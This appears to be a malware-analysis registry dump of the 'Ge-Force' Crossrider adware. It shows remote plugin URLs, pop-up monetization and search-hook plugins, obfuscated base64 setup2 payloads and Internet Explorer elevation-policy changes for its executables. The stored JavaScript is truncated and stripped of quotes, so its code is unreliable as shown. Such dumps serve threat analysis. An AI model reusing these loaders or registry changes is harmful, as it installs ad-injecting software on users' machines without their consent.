"Name" = "IEOnRequest"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Ge-Force-bg.exe" = "8000"
[HKCU\Software\Ge-Force\Plugins\28]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\356]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/356.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Ge-Force\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Ge-Force\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Ge-Force\Plugins\281]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/281.js"
[HKCU\Software\Ge-Force\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"
[HKCU\Software\Ge-Force\Plugins\193]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\195]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/195.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"
[HKCU\Software\Ge-Force\Plugins\207]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\13]
"Version" = "7"
[HKCU\Software\Ge-Force\Manifest]
"PluginsManifestVersion" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Ge-Force\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"
[HKCU\Software\Ge-Force\Plugins\41]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/41.js"
[HKCU\Software\Ge-Force\Plugins\337]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"
[HKCU\Software\Ge-Force\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Ge-Force\Installer]
"FullVersion" = "1.35.12.18"
[HKCU\Software\Ge-Force\Plugins\93]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/93.js"
[HKCU\Software\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"
[HKCU\Software\Ge-Force\Plugins\220]
"Version" = "38"
[HKCU\Software\Ge-Force\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p"
[HKCU\Software\Ge-Force\Plugins\3]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\35]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"
[HKCU\Software\Ge-Force\Plugins\43]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/43.js"
[HKCU\Software\Ge-Force\Plugins\64]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\286]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/286.js"
[HKCU\Software\Ge-Force\Plugins\72]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/72.js"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\9]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'extbjtinex'); }"
[HKCU\Software\Ge-Force\Plugins\78]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\104]
"Version" = "13"
[HKCU\Software\Ge-Force\Plugins\177]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/177.js"
[HKCU\Software\Ge-Force\Manifest]
"ModeType" = "production"
[HKCU\Software\Ge-Force\Plugins\350]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\Ge-Force\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Ge-Force\Installer]
"srcid" = "001729"
[HKCU\Software\Ge-Force\Plugins\13]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/13.js"
[HKCU\Software\Ge-Force\Installer]
"ErrorsDomain" = "http://errors.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Plugins\37]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/37.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Ge-Force\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\180]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/180.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"
[HKCU\Software\Ge-Force\Plugins\356]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:MAN}))();};"
[HKCU\Software\Ge-Force\Plugins\180]
"Version" = "12"
[HKCU\Software\Ge-Force\Plugins\41]
"Version" = "7"
[HKCU\Software\Ge-Force\Plugins\223]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/223.js"
[HKCU\Software\Ge-Force\Plugins\180]
"Name" = "bpo_serp_m"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Ge-Force\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Ge-Force\Plugins\273]
"Version" = "6"
[HKCU\Software\Ge-Force\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\253]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\2]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\39]
"Name" = "IEDatabase"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"
[HKCU\Software\Ge-Force\Plugins\1]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/1.js"
[HKCU\Software\Ge-Force\Plugins\4]
"URL" = "http://js.newstatsclientcloud.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Ge-Force\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ukluucurcg'); }"
[HKCU\Software\Ge-Force\Plugins\286]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'javuqhubvp'); }"
[HKCU\Software\Ge-Force\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Ge-Force\Plugins\195]
"Version" = "28"
[HKCU\Software\Ge-Force\Plugins\46]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/46.js"
[HKCU\Software\Ge-Force\Manifest]
"homepageurl" = "NA"
[HKCU\Software\Ge-Force\Plugins\356]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\14]
"Version" = "11"
[HKCU\Software\Ge-Force\Plugins\301]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/301.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\Ge-Force\Plugins\200]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/200.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elR"
[HKCU\Software\Ge-Force\Plugins\37]
"Version" = "6"
[HKCU\Software\Ge-Force\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Ge-Force\Plugins\43]
"Version" = "5"
[HKCU\Software\Ge-Force\Installer]
"osName" = "XP32"
[HKCU\Software\Ge-Force\Plugins\223]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\177]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\36]
"Version" = "8"
[HKCU\Software\Ge-Force\Manifest]
"PublisherName" = "iWebar"
[HKCU\Software\Ge-Force\Plugins\183]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Ge-Force\Plugins\263]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Ge-Force\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'lllopfcvfr'); }"
[HKCU\Software\Ge-Force\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"
[HKCU\Software\Ge-Force\Plugins\94]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/94.js"
[HKCU\Software\Ge-Force\Installer]
"subid" = "0"
[HKCU\Software\Ge-Force\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi"
[HKCU\Software\Ge-Force\Plugins\253]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/253.js"
[HKCU\Software\Ge-Force\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Ge-Force\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Ge-Force\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"
[HKCU\Software\Ge-Force\Plugins\337]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/337.js"
[HKCU\Software\Ge-Force\Plugins\288]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\21]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/21.js"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKCU\Software\Ge-Force\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\Ge-Force\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\Ge-Force\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,177,91,28"
[HKCU\Software\Ge-Force\Plugins\7]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\246]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/246.js"
[HKCU\Software\Ge-Force\Plugins\47]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\221]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/221.js"
[HKCU\Software\Ge-Force\Plugins\3]
"Name" = "ie8_fix_2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Ge-Force\Plugins\93]
"Version" = "14"
[HKCU\Software\Ge-Force\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'atqblkodft'); }"
[HKCU\Software\Ge-Force\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Ge-Force\Plugins\17]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\263]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/263.js"
[HKCU\Software\Ge-Force\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKCU\Software\Ge-Force\Plugins\182]
"Version" = "3"
[HKCU\Software\Ge-Force\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Ge-Force\Manifest]
"Name" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\Ge-Force\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\Ge-Force\Plugins\38]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/38.js"
[HKCU\Software\Ge-Force\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzMmMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY"
[HKCU\Software\Ge-Force\Plugins\94]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ujvjmfakaj'); }"
[HKCU\Software\Ge-Force\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn@"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\1]
"Version" = "11"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"
[HKCU\Software\Ge-Force\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;)"
[HKCU\Software\Ge-Force\Plugins\44]
"Version" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Ge-Force\Plugins\242]
"Name" = "price_gong_m"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\,"
[HKCU\Software\Ge-Force\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Ge-Force\Plugins\78]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/78.js"
[HKCU\Software\Ge-Force\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Ge-Force\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Ge-Force\Installer]
"FullVersionForUrl" = "1_35_12_18"
[HKCU\Software\Ge-Force\Plugins\223]
